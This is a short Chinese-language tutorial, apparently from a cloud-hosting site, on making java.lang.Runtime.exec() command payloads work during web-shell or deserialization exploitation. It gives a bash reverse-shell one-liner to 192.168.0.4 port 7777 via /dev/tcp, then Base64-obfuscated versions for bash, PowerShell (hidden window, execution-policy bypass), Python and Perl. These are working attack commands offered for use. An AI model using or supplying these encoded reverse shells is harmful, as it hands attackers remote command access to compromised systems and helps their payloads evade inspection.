您好,登錄后才能下訂單哦!
本篇內容主要講解“java.lang.Runtime.exec() Payload命令怎么使用”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實用性強。下面就讓小編來帶大家學習“java.lang.Runtime.exec() Payload命令怎么使用”吧!
有時,通過Runtime.getRuntime().exec()執行命令的有效負載有時會失敗。使用Web Shell,反序列化利用或通過其他媒介時,可能會發生這種情況。
有時這是因為重定向和管道字符的使用在啟動過程的上下文中沒有意義。例如,在shell中執行ls> dir_listing會將當前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數的上下文中,該命令將被解釋為獲取>和dir_listing目錄的列表。
有時,StringTokenizer類會破壞其中包含空格的參數,該類將命令字符串按空格分隔。像ls“我的目錄”之類的東西將被解釋為ls“我的目錄”。
借助Base64編碼,下面的轉換器可以幫助減少這些問題。它可以通過調用Bash或PowerShell來制作管道并重新定向,還可以確保參數內沒有空格。
樣例:
原文
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i} #bash powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA== #powershell python -c exec('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE='.decode('base64')) #python perl -MMIME::Base64 -e eval(decode_base64('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=')) #perl
中間的字符均為“base64”編碼。
到此,相信大家對“java.lang.Runtime.exec() Payload命令怎么使用”有了更深的了解,不妨來實際操作一番吧!這里是億速云網站,更多相關內容可以進入相關頻道進行查詢,關注我們,繼續學習!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。